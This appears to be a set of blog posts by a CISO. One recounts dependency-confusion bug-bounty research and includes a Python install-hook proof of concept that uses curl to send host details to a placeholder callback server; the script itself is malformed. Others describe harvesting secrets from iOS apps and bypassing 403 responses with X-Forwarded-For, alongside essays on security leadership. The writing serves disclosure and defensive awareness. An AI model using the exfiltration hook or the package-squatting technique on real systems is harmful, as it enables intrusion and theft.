How I hacked into Google’s internal corporate assets

It’s raining command injections! 

Every now and then, I take some time to work on bug bounty projects to explore threat vectors into real world targets like Google, Tesla and many others. Doing so helps me stay aware of the fast-changing technical landscape, which is crucial for my role as a technology CISO. Plus, it’s enjoyable and provides extra income. 

On my most recent venture, I focused on open-source and supply chain attacks. Over the period of a week I discovered multiple vulnerabilities, and gained control of (read: “command injection on”) numerous in-scope bug bounty assets. Gaining command injection essentially means the ability to execute arbitrary commands in an Operating System (ie. MacOS, Linux, etc) and in my case – as root or admin. I was able to run OS commands on over a thousand assets including servers, containers, CI/CD systems & developer machines. Six of these assets were Google’s internal corporate assets, many more belonged to a self-driving car company’s build CI/CD pipeline and others I can’t share the details on. These findings were mostly critical with high impact.

Interestingly, in the case of Google, I received an honourable mention but was not awarded a bounty as the most critical asset I compromised was a developers machine. In contrast, I was awarded a bounty by another company for doing just that.

How?

Today, much of our software relies on “open source software libraries” to handle specific software functions. These libraries – essentially small software packages – are freely available to the public to use, support, and maintain. They play a crucial role in speeding up and simplifying software development.

Many of the applications and software we use every day as consumers (ie. banking apps, government services, social media, etc) heavily depend on these open source libraries, often referred to as “dependencies”. During software development, programming languages such as Python and Node.js fetch these dependencies to build the software. 

Developers are familiar with commands like:

  • npm install <packagename>
  • pip install <packagename>

These dependencies can be sourced internally, from within the organization’s artifact registry, or externally, from a public register. However, a significant issue arises when an external attacker identifies and registers a public package that an organization is exclusively using internally.

In such cases, programming languages like Node.js and Python are programmed to automatically retrieve a public version of the package if no local version is available – or if the public version is higher. If the public version is malicious – this can have immediately severe consequences for the software that is being targeted, any sensitive data associated with the software and for the customers who use the software. What’s more, these types of attacks are really hard to detect when they happen. 

How I discovered vulnerable packages

Despite the fact that pioneers of this bug like Alex Birsan had mopped up Apple, Microsoft, Yelp and many other companies who were vulnerable to this attack, I donned my VC thinking and took a somewhat philosophical view that there were a number of fundamentals at play that when combined, would likely result in me still being able to find and exploit these bugs and thereby secure some return on investment. These fundamentals were;

  1. It is likely that many large organizations are vulnerable to dependency confusion in some way and I still believe this to be true even after my exploits – in fact, more-so now. Although I don’t have evidence, I’ve had enough anecdotal conversations to get the impression that not many tech companies are taking an organized and risk based approach to uplifting the security of their CI/CD pipelines. This is not something that security attestations like SOC2 or ISO27001 cover but it is a critical area of risk for software development.
  2. The perceived typical approaches to solving this problem can involve needlessly imposing cost on developer time or on the actual security budget and this has a deterrent effect on the ability for an engineering org to quickly effect remedial change in this space. In other words, it can sometimes be perceived as “hard” or “slow” to fix, which is not entirely true. Fixing this can be as simple as registering legitimate public packages under the same name, that contain no code, but are designed to secure the namespace so it can’t be taken by others. As an aside, I went to a security conference recently, where a security vendor was selling a tool to solve this exact problem. You don’t need to buy a tool to solve this problem and it reinforced to me that this issue is not well understood by security teams – and that is the second fundamental reason why I figured this particular endeavor worthy of some time and effort. 

Some things I observed while doing discovery:

When orgs build their own internal dependencies, these are typically named something that aligns to an internal service or function that is consumed by multiple services or applications. For example, a company might have an internal dependency called “companyname-regex”. This is significant because the names of these internal dependencies can align to names of publicly available names; names that are contained in functions in externally accessible code or even the names of externally accessible apis or services. Extending on this hypothesis, developers might use names that are associated with core products or features. Because of this, a degree of discovering these in public javascript and/or brute forcing them is possible

For me this is the scariest part because of how significant the potential is to target organizations and scale this attack up. I saw evidence from research from companies like checkmarx who had identified actors (unconfirmed if they were malicious or not) who scaled up attacks (creating hundreds of these dependencies) targeting specific companies through what seemed to be similar bruteforcing activity (guessing the names of internal services, utilities, etc).

So I set out to find some vulnerable dependencies. I did this via a number of methods:

  • Scanned hundreds of public github repositories to identify dependencies that looked like internal dependencies. 
  • Spidered and scanned javascript on websites
  • Scanned public web server directories to reveal endpoints like /package.json. 
  • Downloaded old/archived website javascript and scanned that to find references to old dependencies, old javascript functions that have since been removed in the last 5 years but could be used elsewhere. 

Scanning tools that I used included:

  • Confused – this was used to check whether the dependency was in a public register or not. 
  • Other than this, I wrote all of my other tools and used GenerativeAI to speed the process of script writing up. The code it produced was impressive allowed me to conduct a substantial amount of research at a far greater pace than what I ordinarily would have been able to. 

Scanning techniques included:

  • Searching for dependency files in places like github (ie. package.json, dependencies.txt)
  • Searching for functions within public code on websites that refer to possible dependency names. This included:
    • import(‘dependency_path’)
    • require(‘dependency_path’)
    • define(‘module’)
    • “exports=JSON.parse”
    • References to ‘node_module’ where dependency files are usually saved
  • Using regex to search through javascript looking for potential dependency names
    • (example: grep -Por ‘”.*”:”\^[0-9]+\.[0-9]+\.[0-9]+”‘ |  tr ‘,’ ‘\n’  | awk ‘/”.*”:”\^[0-9]+\.[0-9]+\.[0-9]+”/ {print}’ | sort -u)

How I exploited dependency confusion

Once I had identified a number of externally accessible <potential or confirmed> dependency names, getting a command injection on a server to prove the concept was conceptually straightforward but practically difficult. I won’t explain this much here – other resources exist out there that explain this process in more detail. 

However, in essence, using a curl command in a dependency install script like below – once installed on a target host – grabs some basic information about the host and sends it to a server. 

Bear in mind that for some programs, this is actually out of scope (ie Yelp), but for the vast majority of programs where I’ve seen this, they expect some form of command injection as proof – ‘or it never happened’. Always check the program scope before proceeding.

Example PIP Dependency preinstall script. 

import subprocess

def pre_install():

    curl_command = ‘curl -X -H “Hostname: $(hostname)” -H “Username: $(whoami)” -H “Directory name: $(pwd)” https://my-call-back-server

    subprocess.run(curl_command, shell=True)

if __name__ == “__main__”:

    pre_install()

Some things I observed while doing exploitation:

  • Organizations impacted the most were those running continuous delivery and deployment. It didn’t impact software that had a slower development cycle, this is because with continuous delivery and deployment, artifacts are called regularly and automatically and so risk of compromise within a given timeframe is much more likely. Organizations impacted by this bug are typically going to be medium to larger software companies with larger scalable software architectures like Kubernetes. 
  • This also impacts developers. I’d often have developers installing my packages on their local development machines due to a general lack of awareness or vigilance around open source risks.
  • These packages are not just running software around the world, they are the hidden bedrock of our digital economy. Literally the basis upon which commerce happens around the globe – indeed the provision of modern critical services such as healthcare – many of these things are reliant on open source software in some way. All it takes for a financially motivated criminal or some form of espionage is to drop a well targeted package into a public register and BOOM! a malicious actor could gain control of any number of servers across any number of larger organizations. Because of this, I’d love to see these registers work more closely with the bug bounty community to test evasion & detection techniques for malicious packages. 

The qualities of high performing security staff

The speed and reliability at which a CISO can deliver a security strategy depends heavily on the culture and characteristics of the teams and individuals that make up the security organization. It is for this reason that attracting and retaining highly effective security folk is paramount in order to build and run a security organization that is able to deliver what the business wants, in a world where businesses are increasingly wanting more from their security teams.

So what makes for a high performing security folk? I was talking to another CISO the other day who said to me; “some of my best security hires have been people from non-security backgrounds”. I’ve also observed the same thing. Why is that? Well these people often come into the field with a set of soft capabilities that are as equally important as typical security technical skills. These soft skills are what allow them to really make an impact in the security space. So what are these ‘soft skills’?

After hiring & managing performance in this space for a while, in my observation, some of the key soft factors for success are the following traits in no particular order:

Care & ownership

The first trait is to have a high degree of personal accountability & care. This deserves a blog post on its own, but a few examples that come to mind are:

Taking care to perform work to a high standard. This is not just about ensuring that processes are followed correctly, documentation is well written and that communication is effective, it’s also about going demonstrably above and beyond to serve & support other stakeholders.

When mistakes are made – If a failure occurs, take ownership immediately. Shifting blame or excuse making is going to end badly for everyone involved. Taking ownership for our own failures shows that our primary interest is in learning from mistakes – rather than hiding problems. The organization and the team can only win if we collectively own our mistakes both as individuals and as a team. 

Pragmatism

Deciding what not to do is as important as deciding what to do.

This is about taking the path of least complexity and being realistic about what is possible and how it can get done. Sometimes things can be done quicker and more efficiently if we give it more thought. Sometimes, we have to make hard decisions to say “no” to something in order to succeed. 

In practice, this could be about accepting that businesses are rarely in a “blue sky” situation and rather than investing energy in making the impossible possible; focussing on changing the things that we have control over. Over the course of my career, I’ve seen engineers invest too much emotion into wistful thinking and less emotion into accepting reality and getting on with solving the problems that we can control. Being heavily grounded in reality is important. That’s not to say that we shouldn’t be visionary – to the contrary – vision is essential if we want to succeed, however vision and reality need to work together, not against each other. 

Optimism

Is the glass half-empty or half-full?

Putting aside the security context for a moment, it has been scientifically proven in psychology studies that people who face challenges with optimism will be more likely to succeed in overcoming those challenges; those who face challenges with default pessimism will be more likely to fail. 

An optimist will always seek to make something good, even in a bad situation and scurity can potentially be overwhelmingly negative if we allow it to be. It’s not good when you see a security culture that is underpinned by a persistent sense of pessimism  – this is demoralizing and unsustainable. 

Those who succeed in the security space, in my experience, are those who come into work with a sense of implicit optimism and their optimism is applied to their work; spread across various projects, team interactions and whatever challenges that they may face throughout their employment.

Courage & Fearlessness

What are you looking at – a mountain or a molehill?

Sometimes people get hung up on “big problems” when in fact solving the problem is not as quiet as insurmountable as it may seem. Sometimes anxiety can get in the way and create a bigger-than-neccesary psychological barrier.

Security is full of all kinds of challenges and pitfalls and so this is not to say that we should be willingly naive about the impact of threats and risks, but rather that we should be prepared to face them fearlessly, without intimidation. Being educated about the risks is important and fearlessly seeking to solve problems & mitigate risks is equally as important. 

Organization

Delivering any project, large or small, requires some level of personal organization and those who are exceptional at organization tend to be exceptional at delivering larger pieces of work or strategies. 

This is especially important in security for two reasons; firstly security teams need to move quickly and this is more likely to happen when they are well organized. Secondly, security risks are complex, touching on so many facets of an organization and that kind of breadth can’t possibly be managed effectively without some level of organization. 

So having the ability to reach out, grab complexity and chaos and seek to simplify it by structuring it quickly is a really important attribute; I’ve seen some people do it faster than others and subsequently bring more effective and lasting change to an organization, faster. 

Communciation

Communication is like a magic wand and some people wave the wand to great effect. How we communicate directly impacts the ability of an individual, a team and the whole organization to succeed. Some examples of excellent communication include:

  • The ability to listen.
  • The ability to communicate technical concepts in a simple way – this is especially important when communicating to non-technical stakeholders.
  • The ability to communicate risk in a way that the audience understands and appreciates
  • The ability to actively manage perceptions of stakeholders and staff.

Humility

Treats the janitor with as much respect as the CEO. 

Those teams that move quickly and get more done are teams that embrace and support diversity and psychological safety. A key ingredient for psychological safety is to have people who are not invested heavily in defending their own self-importance but rather are genuinely interested in the success and growth of others and are willing to learn from others. For this to happen, humility needs to exist.

In practice, people who exhibilit humility are more willing to listen and take advice from the team and seek to empower the team as a whole. They are more likely to be a supportive and helpful presence when something goes wrong and they are far more likely to build trust with others because less effort is invested in protecting self-importance which can be an inhibitor for building trust & collaboration. 

Transparency

For a team to be able to make informed and effective decisions quickly, a high degree of transparency needs to exist to allow information to flow freely. If an individual deliberately obfuscate’s to protect turf, perceived dignity or perceived reputation, this will slow or inihibit the flow of information which will degrade the ability to make effective decisions or even result in the wrong decisions being made and a wild goose chase unfolding. This is a nightmare scenario when resources are limited and pressure is high to move quickly.

What happens when unsafe AI is profitable

For more than 15 years, tech leaders from around the globe have been lobbying governments to not regulate the technology industry. Over the last 12 months, this sentiment has been virtually reversed with tech leaders pleading governments to regulate Artificial Intelligence (AI). It’s one indication that if we’re going to do AI as a human race, we need to get it right and if we don’t get it right, the consequence will be disastrous.

History serves as a guide for the future

For those who struggle to see the red flags, history serves as a guide; while social media companies were vigorously lobbying against regulation, their algorithms had a vastly damaging effect on the wellbeing of millions of individuals around the world. Countless reports have shown children paying the price because algorithms were serving up content that drove them to eating disorders and even suicide – amongst other things. Yet despite multiple reports of these ill-effects around the globe – and even a coroner’s report in London which ascribed instagram’s algorithm as having contributed significantly to the cause of a death – social media companies insisted that regulation was unnecessary. 

Enter Chat GPT and a tidal wave of sentiment-change swept across the tech industry overnight with tech leaders deciding that regulation of AI was essential. There was a collective realization that this technology was about to become pervasive in our lives far beyond what the common person can possibly understand and without safety measures, its impact might even outpace the trail of disasters that have been left by unsafe social algorithms. 

Over the last 5-10 years, we’ve seen social media companies compete in an arms race to build the most powerful social algorithms yet; these algorithms drive up engagement which in turn drive up revenue. As these tech companies compete for the attention of users around the world, the companies who succeed in growing their revenue and business value are the ones who build the most effective algorithms. This has become a problem for some social media companies – after all – if kids are moving onto other platforms where algorithms are more effective at grabbing their time & attention, this hits revenue and starts to become an existential risk. 

How organizations act when unsafe AI is more profitable

Creating AI that is safe-by-design doesn’t just happen – it takes time and investment. When revenue loss or business viability is a looming threat, the appetite to invest in safety-by-design decreases, resulting in the development of technology that has a higher risk of being unsafe and/or toxic. Frances Haugen – a former Product Manager at Meta & whistleblower – used the term “profit over safety” to describe this phenomenon inside Facebook. We saw an example of this when TikTok experienced a meteoric rise in monthly active users, driving users away from Facebook – Zuckerburg called this out as a threat in an investor call and acted quickly to stay competitive by introducing an updated video algorithm that had a habit of elevating harmful content. Similarly, after facing a loss-making existential crisis, Musk decided to reduce Twitter’s safety team (the team responsible for ensuring content is safe) and following this, researchers identified a rise in unsafe content

As these social media companies drive up their profit & revenue and compete with aggressive algorithms, they are playing with the lives of children. It doesn’t take a coroner’s report or leaked research from inside Meta, to see that. Apart from the fact that this is stealing a generation of livelihoods and having an ever-growing harmful effect on society, it is a harbinger of something more dangerous; it’s a taste of things to come if AI risks aren’t properly understood and managed. 

You don’t need to listen to the hype about Musk’s comment on the likelihood of AI annihilating humanity to know that we have a problem on our hands. Whether you believe Musk or not is arguably immaterial – other problems are fast emerging which have the potential to create anything from vast systemic economic or social imbalances in our society, through to physical safety or privacy issues in the daily lives of people if AI design isn’t done properly from the outset. 

Will a saturated AI market give rise to toxic business models?

Perhaps the most significant lesson to be learned from the history of social algorithms is that the pain wrought by these algorithms is not at the hand of one or two companies – the toxicity extends across an entire industry. These businesses live and die by how effective their algorithms are and it is this investor charged competition that has created an ‘algorithmic arms race’ which is happening at the expense of children. Similarly, a time will come when the market will be saturated with businesses who wield AI to great effect and the question will no longer be “do you have AI” but rather “how effective is your AI”. When this happens, businesses and entire industries whose competitive advantage depends on how effective their AI is, will more likely act in unethical or unsafe ways (ie. development of unsafe AI) to maintain a competitive advantage. At this point – like we saw with social algorithms – we could see large-scale development and use of AI which is causing harm in ways that people don’t expect. 

How security leaders can make a positive impact right now:

#1 – Educate yourself on emerging frameworks & regulations.

It’s positive to see regulators and organizations moving quickly to introduce guidelines for the safe development of AI. Google, for example, has released a set of recommended practices for responsible AI and these are excellent resources for CEO’s, CTO’s & CISO’s to consume. If, as a security leader you are not already reviewing these emerging regulations and frameworks and using them as a basis for discussion with stakeholders in your business & the broader industry, then now is a great opportunity to start. 

#2 – Start to think about how your vendors need to be more transparent on this.

When sourcing AI based products, CISO’s need to understand where and how AI is being used in their organizations; are vendors and providers being transparent around their use of AI in their products? What are vendors doing to ensure that equitability, interpretability, safety and privacy are baked into their AI by design? CISO’s need to seek more transparency from vendors on this and by demanding more transparency, they will send a signal to vendors that anything less is not commercially viable. 

#3 – If your org builds AI, you need to have a meaningful ethics framework in place

At this point, the burden of responsibility sits with software & tech companies who are actually building AI. Never before has safe-by-design principles been so sorely needed; as AI models are being built, the core principles of equity, safety and privacy need to be seriously considered as part of the design of these models and AI & ML teams need to be trained on and take ownership of responsible AI principles & practice. Board members need to be asking their CEO’s whether they have meaningful ethics frameworks that govern how AI operates within their technologies. Without a framework and a vision to guide the responsible development of AI, history will only repeat itself; lucrative – but toxic – business models will spawn, spurred on by investors while in the background, the lives and wellbeing of individuals will be left on the wayside – just another job for the coroner to investigate.

The Security Organization

Over the coming months I’ll be writing a series addressing key challenges that CISO’s face – challenges that security folk typically don’t get trained on – and how I personally solve these as a CISO. I hope this will be a source of inspiration for other CISO’s and at the veorry least, a useful resource for others who are starting to move into this space.

I’ll be covering topics such as designing an organizational structure, optimizing the organization, effective strategy & planning, winning over the business, staff attraction & retention, the mindset of a CISO & much more. 

Organizing the security organization 

The first topic I want to consider is organizing the organization. For the purposes of this post, when I talk about “the organization” I’m referring to the teams that the CISO has line management of – not the rest of the business. As CISO’s we will typically end up running an organization which is made up of a number of internal experts & outsourced partners. I run an organization which is made up of experts in application security, penetration testing, cloud security, data privacy & protection, security operations, infrastructure security, compliance & assurance and more. Managing an organization is not – in and of itself – a unique task, however deploying an organization to reduce complex risk as ~ efficiently as possible ~ is nothing less than a work of art.

The challenge many CISO’s have is to ensure that the organization is appropriately structured in terms of size and capability in order to deliver the security & privacy strategy for the organization and its customers. The strategy will almost always include risk reduction which can manifest in a diversity of programs and initiatives across the business which impact the enterprise and any products or services sold by the business. In addition, a strategy may also involve ensuring that customers have true agency over their data (privacy), that customers have assurance in the services or products provided by the business and that investors know they are buying an asset that they can have confidence in. In practice, deploying an organization to facilitate these things can be a very complex task and so it is absolutely essential that the CISO is able to regularly assess the performance of their own organization to ensure it is optimally delivering value to the business.

So if keeping the security & privacy organization performing at peak is so important, how do we do it? In order to remain optimal, here are a few essential characteristics that the organization needs to be – or have:

Extrospection

The first characteristic is extrospection. The organization must be structured to systemically have a high level of awareness of the external environment. This can include awareness of external risks & threats, threat actors, industry trends, market competition, the broader organization, emerging technologies, modern architectures and so much more. This should be both an individual & cultural imperative and also something that is systematized across the organization. Without this information, the organization will fail to understand what threats are meaningful, what competitors pose a risk, what emerging regulations will impact the business, what industry trends can be exploited and how to effectively influence the broader organization – amongst other things. Without awareness of the external environment, the organization will lose its identity, purpose and grasp on reality and this will result in a failure to deliver the strategy and add meaningful value to the business. Unless such awareness is carefully systematized and infused in culture across the security & privacy organization, the outcome could become existential – for the business and/or the CISO!

Empowered

The organization needs to have the power it needs to carry out the strategy. In practice, this means the organization needs to be resourced appropriately, partnered well, that the right levels of governance, leadership and sponsorship are in place – and that the entire security organization has trust of the business. The CISO needs to ensure that no parts of the org are spinning wheels and that when spinning wheels are encountered the problem is quickly addressed so that the rubber can once again hit the road.

Trusted

Trust is not just something the CISO needs to build personally, it’s something that needs to exude from the organization. When partners, external stakeholders, customers or prospective employees look into a security organization, they need to feel they can trust it. 

Engineering trust happens from the ground up – it doesn’t happen using the :wave hand: emoji. Trust is built every time you introduce or adjust a process; it’s built every time you implement or change a system; it’s built or lost every time you make a change to the organizational structure. 

As a CISO, trust is scrutinized and subsequently won or lost with every single word you use and every single action you take. Likewise, this applies to the security organization overall. To use an analogy, the security organization has a ‘trust bucket’. Every day, the org is performing thousands of interactions per day with stakeholders (process & system interactions, staff communication, etc). Every interaction has an effect on your organization’s trust bucket. Either someone (ie. an individual or team) or something (ie. a process) is spending that trust – or they are earning it. As the trust bucket depletes, the level of noise increases, degrading the ability of the organization to meet its operational and strategic objectives. As the trust bucket fills, the reverse happens and the organization is celebrated.

A key ingredient I use for building a highly trusted organization includes attracting, retaining and building field experts/leaders who are effective communicators, humble (low-ego) and who embrace a culture of psychological safety. 

Agile

The external environment is constantly changing; new threats, new vulnerabilities, new geopolitical challenges, new regulations, new frameworks. Not only this, the broader business will also experience changes in persuit of its mission. As these changes happen, the security organization needs to be able to pivot and adapt quickly in order to exploit both tactical and strategic opportunities. This is a working philosophy that individuals need to be personally invested in as well as something that needs to permeate the org structure & culture.

Agility & change is usually accepted more readily when the ROI is clear. Articulating the ROI is something that organizational leaders need to be in the habit of doing in order to drive the change that is needed.

Capable

The organization needs to have the right set of capabilities in place to support the delivery of the strategy. This is not just referring to technical or SME capabilities (which are important) but also soft capabilities such as the ability to communicate powerfully, the ability to influence, personal resilience and more. 

Understanding who should do what, what capabilities are deficient and how to rectify this is something that only the CISO will need to have the final say on. 

Tuned

Finally, the CISO needs to treat the organization like a living breathing organism – it needs constant care & constant tuning. CISO needs to understand current and emerging threats to the organization itself and also emerging constraints to any of the above to ensure they are managed before it is too late.  

As part of this, CISO’s need to consider:

  • The management of the supply and demand of resources. There is a great article covering this here by GCP’s CISO Phil Venables which goes into a bit more detail on this in context of security budgets. 
  • Regulate the speed of systematization – sometimes teams & services need more systematization, sometimes they need less. The CISO needs to ensure that the organization is maturing and growing at a practical and sustainable rate. Striking a balance of investment here is important. Doing things for the sake of doing them is wasted investment.
  • Ensure that the organization structure is actually delivering the outcomes needed by the business. Tracking this with metrics is a great way to monitor this. I’ll write a separate post later on what metrics can be useful in this context.

Dealing with stress as a security leader

Over the last few months I’ve been asked by multiple people how I deal with stress. This is no surprise – it is well documented that Chief Information Security Officers and many other security professionals have uniquely stressful line of work.

Security leaders have all kinds of challenges to deal with in the course of protecting their business and its customers. The stakes are especially higher when protecting not just information, but people’s lives and/or quality of life.

In order to be effective, security leaders need to manage risk in extremely complex environments. This responsibility can extend to managing teams, creating vision, inspiring change, negotiating with stakeholders, organising systems, people & work, planning how to execute on the vision and lots more. In so far as management goes, this is nothing particularly new.

However, security leaders have a pivotal role in protecting the organisation and its customers from crisis; cyber attacks have a way of choosing the least opportune moment to strike and when they do, security leaders are on the hook. Security leaders are scrutinised by their ability to protect and lead the organisation both from crisis and at a time of crisis.

To compound this, global security is declining. International cyber-crime groups are flourishing with impunity in places like Russia. Geopolitical alliances are sharply polarising with the risk of collateral damage of cyber-warfare spilling over and impacting western businesses. Both threats present a very real risk to western businesses, and the lives and livelihoods of people in the west.

So I reflected on the question that was posed to me – “how do you do it?”

For me personally, the last few months have been especially crazy. My wife has been in hospital several times. We’ve had a fourth child and we’ve had limited sleep. Believe it or not, that’s not the challenging part.

The really challenging part for us has been supporting our kids – we now have 4 children, two of whom are high functioning ASD. Anyone who has experience with ASD will be familiar with the hour by hour challenge of dealing with emotional dysregulation and typical challenges associated with challenged executive function. This can be relentless and thoroughly exhausting for the child/ren and the parents.

So in reflection, no shortage of stressors in my personal and professional life. So to answer the question, how do I manage it?

Perspective & purpose

What’s important in life?

For me it’s my family and my future. As much as I love my work and the team at work, I have a very clear purpose and future for my life that doesn’t include work. That’s not to say that I slack off at work – quite the opposite, I’m known for being motivated, focussed and hard working. But work isn’t the end-goal for me. I’m invested in doing a great job, but far more invested in my future & purpose. Unfortunately too many people conflate these things.

Meditation

I meditate every day – it clears my mind and brings me a profound sense of peace – even after a harrowing day. Meditation takes many different forms – my meditation consists of reading through the Bible, understanding it and and deriving meaning and purpose.

Allocating time to meditate is essential in order to have a mind that is clear and effective. Research has shown that meditation is especially helpful for anyone struggling with anxiety or other mental health issues which typically amplify stress.

Compartmentalisation

When I switch off work, I try to switch off properly. Research has shown that this is an extremely effective way of dealing with stress. I do this in a few ways.

  • I use the focus feature on my mobile phone to control who/what can contact or send me a notification and when. This does things like block calls during dinner time so that we can share an uninterrupted family dinner.
  • When I finish work, I leave my phone in my room and only use my Apple Watch for minimal interaction with notifications.
  • If I work after-hours, it’s usually only on the condition that it will not result in unmanageable stress or conflict with other personal matters which would otherwise increase stress.

Delegation

I push work to trusted individuals. If you haven’t built a team that you trust as a security leader, you need to build a trusted and competent team so that you can delegate. Building trust in your team can only happen if you have the right culture.

Prioritisation

Across the industry, security people often have XXX hours worth of tasks that need to be done in a day.

Constantly stepping back, and reassessing and splitting my work into 80/20 is important. I can’t do everything, so I pick what I colloquially call “the burning priorities”. Those that don’t make the cut get delegated to other trusted individuals and others I’ll defer or push back on.

Improving – or implementing – the systems and/or processes that are needed to manage the flow of work in the organisation is also an effective way to ensure that prioritisation and focus is correctly systematised.

How to optimize your hacking by understanding your mind.

Over the course of my career, the limitations and capabilities of the human brain and how these impact the tasks we perform, the choices we make and our long term career trajectory has been a source of great fascination for me.

When solving problems at work we rarely take a step back and consider to what extent our mind is equipped to handle a particular task. Usually we just focus on fixing the problem, not optimising the thing that is fixing the problem.

But the reality is that inside our heads, we are each equipped with a kit that contains its own incredibly unique set of limitations and strengths.

To illustrate the point, we might briefly compare the brain with a car; you don’t drive a racing car up a sand dune or race a four wheel drive against other F1 cars.

The reality is that each of us have a brain that is equipped with a varying set of cognitive abilities. Understanding your cognitive strengths and weaknesses can help improve your ability to perform your work. You can capitalise on your cognitive strengths and you can find ways to mitigate the effect of your cognitive struggle.

So what are some practical examples of this? While I’m going to provide examples which can be applied to all types of work, I’ll use hacking as the practical example.

Let’s start with executive function.

Executive function

Executive function is the cognitive process that helps us to regulate, control and manage our thoughts and actions. It includes a number of cognitive processes, but for the purpose of this post, I want to focus on only three of them.

Each of us have certain strengths and certain struggles with our executive function. These struggles can be amplified significantly for people with ASD or ADHD.

Task Initiation

Task initiation refers to the capacity to begin a task or activity, as well as independently generating ideas, responses or problem solving strategies. People who struggle with initiation typically want to succeed at a task but can’t get started

A great example of this is bug hunting. Hunting for bugs or exploits that allows a hacker to exploit a system is usually something that people do in their spare time, so usually self discipline is needed to sit down and well… start.

I see people all the time who want to get started in bug hunting and despite all the advice out there to just “get started” some people really struggle to just get started. And for some people – those who struggle with task initiation – this is a very real issue. Usually these people are just as smart as anyone else, but the one thing holding them back is cognitive struggle encountered when initiating tasks.

I’ve seen some great initiatives within infosec at a very local level which inadvertently help people who struggle with this. Local study groups who proactively encourage beginners to join in are a great way to bridge this gap.

If on the other hand, you have no trouble initiating a task, then use it to your advantage! start a local meetup. Join an organising committee. Invite a friend who struggles with task initiation to collab with you. Initiate your work and career away.

Planning and organisation

Planning and organisation refers to a person’s ability to to manage current and future-oriented task demands. Planning relates to the ability to anticipate future events, set goals and develop appropriate steps ahead of time to carry out a task or activity. Organisation relates to the ability to bring order to information and to appreciate the main ideas or key concepts when learning and communicating information.

In information security there is an array of roles that require varying levels of organisational and planning ability. Its worth analysing your capacity to plan and organise and then aiming for a role which aligns with your capability in this area.

In the past, I’ve made the mistake of hiring someone who while technically excellent, struggled to manage small projects. They really struggled with their ability to plan and organise. That person was able to thrive much more in an engineering context where they execute to a set of sequential instructions.

As a bug hunter, organising is helpful for reconnaissance and planning is helpful for exploitation. I’ve seen bug hunters do these things at varying levels of complexity. If planning and organisation is a strength or yours, then use it to map out a plan on how to get to your ideal role, or attack your ideal target.

On the flip side, if you struggle in this area and you want to bug-hunt, I think you are in luck – not much planning or organisation is actually needed to discover and exploit bugs.

Working memory

Working memory (not to be confused with short-term memory) is your mental sticky note or sketchpad. It’s a skill that allows us to work with information without losing track of what we’re doing. 

It describes how much working information you can store in your mind at a given time. For example, you might be storing lines of code, exploit strings, heck – even UUIDS or hashes.

How much information you hold in your working memory determines how much of the overall informational picture you can see/process at once.

Struggle with working memory might result in someone struggling to remember their code logic while scripting, or could require someone to reference documented instructions more regularly to compensate for not being able to hold the instructions in working memory.

If you have a bigger working memory, then this is going to be particularly beneficial if you are reverse engineering, doing OSINT or building an exploit.

If you struggle with working memory you might need to consider ways to mitigate the impact of this. For example, you could work on visualisation skills. Visualising the problem requires your brain to store the information differently. Breaking big chunks of information into bite sized pieces also helps to digest information more easily.


While our executive function is made up of many cognitive processes, executive function is just one aspect of how our minds are equipped to handle the problems that we solve each day. There are many other aspects of our minds that are used to solve problems and make decisions and process information.

And the more we learn about our minds, the better equipped we are to solve tasks more efficiently and do our work more effectively.

Do yourself a favour and become more effective at work – doing the hacking or whatever your doing – by identifying your cognitive strengths and weaknesses and how to use these to your advantage.

Related resources

What are cognitive abilities and skills, and can we boost them?

Walking the path least trodden – hacking iOS apps at scale

This is a story of how I set out to find some bounties and how I found gold, hacking iOS apps, at scale.

One of the essentials qualities of a bug hunter is the ability to find exploitable vulnerabilities that others haven’t found.

The ability to find bugs not discovered by others is a quality that comes from – not deep technical knowledge – but rather, creativity and innovation.

So how to get an edge over others? – find the path least trodden.

How to find the path least trodden? be creative: come up with new ways to build footprint/reconnaissance on a target.

In my case, I decided to apply this concept to an area of bug bounties which usually doesn’t get as much attention as web applications: iOS apps.

I also chose iOS apps, because they are closed source, and not straight-forward to hack. I figured, that because hacking iOS apps has a price barrier to entry, as well as messy configuration would mean I would be working on targets which other researchers would be less likely to see. Therefore, it would be a path, least trodden.

So I set out on the task; found an old iPhone, went out and purchased a MacBook, used that to root the iPhone. Then in order to be able to decrypt and download in-scope bug bounty apps, I had to configure a few apps.

After some tinkering, I built an end-to-end workflow, called iGold, which enabled me to hack in-scope iOS apps at scale with little manual involvement.

I wrote the workflow in bash, and it enabled me to perform two key functions:

Use case 1 (on-demand): Whenever I see a new bounty program, I can download the iOS app onto my phone which triggers a process to automatically download, decompile the app, test API key access to database’s etc.

Use case 2 (bulk): Download hundreds of apps from various bounty platform’s at once. As they are downloaded, they are automatically decompiled and tested, en masse.

The script essentially decrypts iOS applications, downloads them, decompiles them, converts plist files, performs some class dumping, run’s strings on the binaries, and then starts grepping this data for specific targets like API keys, URL’s, tokens, and all manner of secrets using regex. The script also tests some API keys.

I compared my script process with some common tools like MobSF, and found that in some cases I was looking for things that MobSF was not searching for.

Because I was able to perform this recon at scale, I was able to discover a number of interesting things – which I’ll break into two categories.

  1. Secrets (as expected) – found a number of API keys which had not been discovered by others.
  2. Valuable recon about organisations which is otherwise hard/impossible to get.

I found point 2 to be of more value.

By way of example, I discovered an iOS app binary which contained an s3 bucket address. I then looked the address up and found it was public. I then identified a very suspicious looking file in this public bucket, but alas, the file was blocked/secured. I knew they had a number of private buckets, so I scanned the same file name against their private bucket and then I got a hit – it downloaded.

On another occasion, I found an s3 bucket address in a binary which contained a file which once downloaded and decompressed contained the administrative credentials to their entire global AWS tennancy.

Oftern less attention is given to securing assets that are harder to find – so find the path least trodden!

Bypassing 403

A few weeks ago I came across this cool “accidental” exploit vector which was documented about 8 years ago by IRCmaxwell and describes a way to trick servers (behind a reverse proxy or load balancer) into thinking a HTTP request which is ordinarily unauthorised, is actually authorised.

I read the blog post while doing some research into the X-Forwarded-For http request header and immediately identified this “accidental exploit” as a really cool use-case for applying to bug bounty targets.

To explain this exploit we need to first understand the purpose of the X-Forwarded-For request header.

The X-Forwarded-For (XFF) header is a de-facto standard header for identifying the originating IP address of a client connecting to a web server through an HTTP proxy or a load balancer. When traffic is intercepted between clients and servers, server access logs contain the IP address of the proxy or load balancer only. To see the original IP address of the client, the X-Forwarded-For request header is used.

https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For

This header is used and implemented in a variety of ways and because of this, it can also be exploited in a variety of ways. Researchers often use this header to inject SQL payloads, perform proxy enumeration, client IP spoofing, SSRF and many other interesting use-cases which I’ll cover later.

